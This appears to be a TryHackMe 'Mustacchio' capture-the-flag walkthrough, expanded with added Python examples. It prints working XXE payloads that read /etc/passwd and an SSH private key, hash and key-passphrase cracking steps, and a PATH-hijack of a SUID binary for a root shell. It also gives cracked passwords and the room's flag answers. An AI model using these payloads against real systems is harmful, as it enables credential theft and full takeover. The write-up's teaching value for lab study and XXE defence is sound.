TryHackMe - Mustacchio - Writeup
Easy boot2root Machine
Nmap Scan
root@ip-10-10-97-27:~# nmap -sCV -p- 10.10.91.167 -T4
Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-12 09:53 BST
Nmap scan report for ip-10-10-91-167.eu-west-1.compute.internal (10.10.91.167)
Host is up (0.00049s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
| 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
MAC Address: 02:71:2C:CE:E8:AD (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 637.98 seconds
Directory Fuzzing
root@ip-10-10-97-27:~# dirb http://10.10.91.167
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jun 12 09:16:44 2021
URL_BASE: http://10.10.91.167/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.91.167/ ----
==> DIRECTORY: http://10.10.91.167/custom/
==> DIRECTORY: http://10.10.91.167/fonts/
==> DIRECTORY: http://10.10.91.167/images/
+ http://10.10.91.167/index.html (CODE:200|SIZE:1752)
+ http://10.10.91.167/robots.txt (CODE:200|SIZE:28)
+ http://10.10.91.167/server-status (CODE:403|SIZE:277)
Browsing to http://10.10.91.167/custom/js/ shows a file named users.bak, which turns out to be an SQLite database rather than a script:
root@ip-10-10-97-27:~# file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001
Opening the database with DB Browser for SQLite (or the sqlite3 CLI) shows a single user, admin, with a hashed password; the same hash also appears in http://10.10.91.167/custom/js/mobile.js. The hash is 40 hex characters, which is the length of an unsalted SHA-1 digest, not MD5. A lookup service does not decrypt a hash, it matches the digest against a precomputed table of candidate plaintexts; submitting it to https://hashes.com/en/decrypt/hash returns the plaintext:
1868e36a6d2b17d4c2745f1659433a54d4bc5f4b:bulldog19
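The same result can be reproduced offline, which matters when you cannot paste a target's hash into a third-party site. The script below is an added example, not part of the original writeup: it reads the users table out of an SQLite file, guesses the algorithm from the digest length, and runs a dictionary attack with hashlib. The table and column names (users, username, password) are assumed, and the wordlist is a constructed stand-in for rockyou.txt; only the admin row's username and hash come from the page.

```python
import hashlib
import sqlite3

# Digest length in hex characters -> hashlib name, for the unsalted hashes
# that usually turn up in leaked user tables.
HEX_DIGEST_ALGOS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}

# The one row found in users.bak: username and hash are from the writeup;
# the table/column names used below are assumed.
PAGE_ROW = ("admin", "1868e36a6d2b17d4c2745f1659433a54d4bc5f4b")

# Constructed stand-in for a real wordlist such as rockyou.txt.
DEMO_WORDLIST = ["password", "admin123", "mustacchio", "bulldog19", "barry"]


def load_users(con):
    """Return (username, password) rows from an open SQLite connection."""
    return con.execute("SELECT username, password FROM users").fetchall()


def identify_hash(digest):
    """Guess the algorithm from the length of a bare hex digest.

    Returns a hashlib name, or None when the value is not plain hex of a
    known length (salted formats such as $6$... need john or hashcat).
    """
    d = digest.strip().lower()
    if d and all(c in "0123456789abcdef" for c in d):
        return HEX_DIGEST_ALGOS.get(len(d))
    return None


def crack(digest, wordlist):
    """Dictionary attack on one unsalted digest; returns the plaintext or None."""
    algo = identify_hash(digest)
    if algo is None:
        raise ValueError("not a bare hex digest of a known length: %r" % digest)
    target = digest.strip().lower()
    for word in wordlist:
        word = word.rstrip("\r\n")
        # surrogateescape round-trips the raw bytes of non-UTF-8 wordlist lines
        if hashlib.new(algo, word.encode("utf-8", "surrogateescape")).hexdigest() == target:
            return word
    return None


def read_wordlist(path):
    """Stream a wordlist line by line; rockyou.txt is not valid UTF-8."""
    with open(path, encoding="utf-8", errors="surrogateescape") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


def make_demo_db():
    """In-memory copy of users.bak with the assumed schema.
    Against the real file use sqlite3.connect("users.bak") instead."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)", PAGE_ROW)
    return con


def crack_all(con, wordlist):
    """Identify and crack every hash in the users table: {user: (algo, plaintext)}."""
    results = {}
    for user, digest in load_users(con):
        results[user] = (identify_hash(digest), crack(digest, list(wordlist)))
    return results


if __name__ == "__main__":
    for user, (algo, plain) in crack_all(make_demo_db(), DEMO_WORDLIST).items():
        print(user, algo, plain)
```

For the real file, replace make_demo_db() with sqlite3.connect("users.bak") and DEMO_WORDLIST with read_wordlist("/usr/share/wordlists/rockyou.txt"); an unsalted SHA-1 over rockyou takes seconds in pure Python.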
SSH is open on the box, so the obvious first try is admin:bulldog19 over SSH, which fails. The login page on port 8765 does accept admin:bulldog19, though, and we land in the admin panel.
Viewing the source of home.php shows a commented-out cookie assignment, document.cookie = "Example=/auth/dontforget.bak", which names a backup file worth fetching:
<script type="text/javascript">
//document.cookie = "Example=/auth/dontforget.bak";
function checktarea() {
let tbox = document.getElementById("box").value;
if (tbox == null || tbox.length == 0) {
alert("Insert XML Code!")
}
}
</script>
</head>
<body>
<!-- Barry, you can now SSH in using your key!-->
Requesting http://10.10.91.167:8765/auth/dontforget.bak returns a sample of the XML that the viewer expects:
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
The viewer hands this XML to a parser with external entity resolution enabled, so it is vulnerable to XXE (XML External Entity injection): a DOCTYPE can declare an entity whose SYSTEM identifier is a local file, and any field that references the entity is rendered back with the file's contents. The payload below reads /etc/passwd to confirm the bug and to list the local users; the HTML comment above ("Barry, you can now SSH in using your key!") suggests an SSH private key is the real target.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxepay [
<!ELEMENT xxepay ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment>
<name>&xxe;</name>
<author>Any Author</author>
<com>Any comment</com>
</comment>
The response echoes /etc/passwd in the name field, and it lists a user named barry. Changing the path to /home/barry/.ssh/id_rsa retrieves his private key (the file is read with the web server's own privileges, which evidently suffice for this key):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxepay [
<!ELEMENT xxepay ANY >
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
<name>&xxe;</name>
<author>Any Author</author>
<com>Any comment</com>
</comment>
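Both payloads work for the same reason, and it is worth seeing that reason in code before moving on. The script below is an added example, not code from the room or the writeup: it builds a payload of the same shape as the two above and parses it with Python's expat-backed xml.sax, once with external general entities enabled (reproducing the viewer's bug, where the SYSTEM file is spliced into the name field) and once with the default, which leaves the entity empty. The passwd-style line it reads is written to a constructed temporary file, not taken from the target.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def build_payload(path):
    """Same shape as the writeup's payloads: an external general entity whose
    SYSTEM id is a local file, referenced from <name> so the viewer echoes it."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE xxepay [\n"
        "<!ELEMENT xxepay ANY >\n"
        f'<!ENTITY xxe SYSTEM "file://{os.path.abspath(path)}" >]>\n'
        "<comment>\n"
        "<name>&xxe;</name>\n"
        "<author>Any Author</author>\n"
        "<com>Any comment</com>\n"
        "</comment>\n"
    ).encode("utf-8")


class CommentHandler(ContentHandler):
    """Collects the text of <name>, <author> and <com>, as the viewer does."""

    def __init__(self):
        super().__init__()
        self.fields = {"name": "", "author": "", "com": ""}
        self._current = None

    def startElement(self, tag, attrs):
        if tag in self.fields:
            self._current = tag

    def endElement(self, tag):
        if tag == self._current:
            self._current = None

    def characters(self, data):
        if self._current is not None:
            self.fields[self._current] += data


def parse_comment(xml_bytes, resolve_external_entities):
    """Parse a comment with expat via xml.sax.

    resolve_external_entities=True reproduces the viewer's bug: expat follows
    the SYSTEM id (file:// here, but http:// works too) and splices the
    content into the document. False, the default in current Python, leaves
    the entity empty.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = CommentHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.fields


def has_dtd(xml_bytes):
    """Cheap pre-parse check: a comment never needs a DOCTYPE, so reject any."""
    return b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes


def demo():
    """Write a constructed passwd-style file, then parse the same payload
    with and without external entity resolution."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("barry:x:1000:1000:Barry Clad:/home/barry:/bin/bash\n")  # constructed line
        secret = fh.name
    try:
        payload = build_payload(secret)
        leaked = parse_comment(payload, resolve_external_entities=True)["name"]
        safe = parse_comment(payload, resolve_external_entities=False)["name"]
        return leaked, safe, has_dtd(payload)
    finally:
        os.unlink(secret)


if __name__ == "__main__":
    leaked, safe, flagged = demo()
    print("external entities on :", repr(leaked))
    print("external entities off:", repr(safe))
    print("DOCTYPE pre-check rejects payload:", flagged)
```

The fix on the server side is the second branch: keep external entity resolution off (in PHP that means never calling libxml_disable_entity_loader(false) and, on libxml2 older than 2.9, calling it with true) and, since a comment form has no legitimate use for a DTD, refuse input that contains one before it ever reaches the parser.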
The second payload returns the private key. Copy it from the page's view-source rather than the rendered page so that the line breaks survive; ssh rejects a key whose formatting has been mangled.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E

...

-----END RSA PRIVATE KEY-----
The key is passphrase-protected: Proc-Type: 4,ENCRYPTED with a DEK-Info header is the legacy OpenSSL PEM format, which derives the AES key from the passphrase with a single MD5 round (john reports exactly that below as KDF cost 0 and iteration count 1), so a dictionary attack is cheap. Convert it with ssh2john and run john against rockyou:
root@ip-10-10-97-27:~# python3 ssh2john.py id_rsa > id_rsa.enc
root@ip-10-10-97-27:~# john id_rsa.enc --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames (id_rsa)
The passphrase is urieljames. Make the key file private first (chmod 600 id_rsa; ssh refuses a key that other users can read), then log in as barry with the key and the passphrase:
root@ip-10-10-97-27:~# ssh -i id_rsa barry@10.10.91.167
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
13 packages can be updated.
10 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
barry@mustacchio:~$ cat user.txt
62d77a4d5f97d47c5aa38b3b2651b831
What is the user flag?
- Answer: 62d77a4d5f97d47c5aa38b3b2651b831
For privilege escalation the first thing to check is sudo -l; on this box it gives nothing usable. /etc and /opt hold nothing interesting either.
The room's hint mentions SUID, so the next step is to list every SUID binary:
barry@mustacchio:~$ find / -perm /4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log
/bin/ping
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su
The one that stands out is /home/joe/live_log: every other entry is a stock system binary, while this one is a custom SUID executable in another user's home directory. Running it prints a live tail of the admin panel's access log. strings shows how it does that:
barry@mustacchio:~$ strings /home/joe/live_log
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
The string tail -f /var/log/nginx/access.log is the command that produces the live log, and strings also shows the binary imports system, setuid and setgid. So the command is run through system(), that is /bin/sh -c, with tail given as a bare name rather than an absolute path. The shell resolves a bare name through the caller's PATH, which barry controls, and because the binary is SUID root and calls setuid, whatever tail the shell finds runs as root.
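Spotting that by eye works for one binary; for a long SUID list it is worth automating. The script below is an added example and not part of the writeup: it extracts printable strings from a file the way strings does, then flags the combination that makes a SUID binary PATH-hijackable, a shell-spawning or PATH-searching libc call together with a command line whose first word is a bare program name. The bare-command rule is a heuristic (a lowercase word followed by an argument that starts with - or /) and will miss or over-match some binaries. The PAGE_STRINGS list is the strings output shown above; the ELF bytes in the self-test are constructed.

```python
import re
import sys

# Printable ASCII runs, the same rule GNU strings uses by default.
PRINTABLE_RUN = rb"[\x20-\x7e]{%d,}"

# libc entry points that hand a command line to /bin/sh or search PATH.
SHELL_OR_PATH_FUNCS = {"system", "popen", "execvp", "execvpe", "execlp"}
# Calls that change the identity the child inherits.
PRIV_FUNCS = {"setuid", "setgid", "seteuid", "setegid", "setresuid", "setresgid"}

# Heuristic: "<bare lowercase program name> <arg starting with - or />".
BARE_COMMAND = re.compile(r"^([a-z][a-z0-9_.+-]*)\s+([-/]\S*.*)$")

# The strings output for /home/joe/live_log as shown in the writeup.
PAGE_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2", "libc.so.6", "setuid", "printf", "system",
    "__cxa_finalize", "setgid", "__libc_start_main", "GLIBC_2.2.5",
    "_ITM_deregisterTMCloneTable", "__gmon_start__", "_ITM_registerTMCloneTable",
    "u+UH", r"[]A\A]A^A_", "Live Nginx Log Reader",
    "tail -f /var/log/nginx/access.log",
]


def extract_strings(data, min_len=4):
    """Return printable ASCII runs of at least min_len bytes, like `strings`."""
    return [m.group().decode("ascii")
            for m in re.finditer(PRINTABLE_RUN % min_len, data)]


def strings_from_file(path, min_len=4):
    with open(path, "rb") as fh:
        return extract_strings(fh.read(), min_len)


def triage(strings):
    """Flag a binary whose embedded command lines are resolved through PATH.

    Returns the matching libc imports, the privilege calls, every
    (program, command line) pair with a bare program name, and a verdict.
    """
    found = set(strings)
    bare = []
    for s in strings:
        m = BARE_COMMAND.match(s.strip())
        if m:
            bare.append((m.group(1), s.strip()))
    shell_funcs = sorted(found & SHELL_OR_PATH_FUNCS)
    return {
        "shell_or_path_exec": shell_funcs,
        "privilege_calls": sorted(found & PRIV_FUNCS),
        "bare_commands": bare,
        "path_hijackable": bool(shell_funcs) and bool(bare),
    }


if __name__ == "__main__":
    # Usage: python3 suid_triage.py /home/joe/live_log [more binaries...]
    for path in sys.argv[1:]:
        print(path, triage(strings_from_file(path)))
```

Run it over each result of the find command above; a verdict of path_hijackable with setuid in the privilege calls is exactly the live_log case. Absolute command paths (or a binary that resets PATH before calling system()) do not trigger it.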
Go to /tmp and create a file named tail with the following contents, so that the hijacked lookup simply spawns a shell:
#!/bin/bash
/bin/bash
Make it executable and put /tmp at the front of PATH so it shadows /usr/bin/tail:
barry@mustacchio:/tmp$ chmod 777 tail
barry@mustacchio:/tmp$ export PATH=/tmp:$PATH
barry@mustacchio:/tmp$ which tail
/tmp/tail
Now run /home/joe/live_log: the SUID binary's shell finds /tmp/tail first, executes it as root, and drops us into a root shell.
root@mustacchio:/tmp# cat /root/root.txt
3223581420d906c4dd1a5f9b530393a5
What is the root flag?
- Answer: 3223581420d906c4dd1a5f9b530393a5
Thanks for reading
Room Link: Mustacchio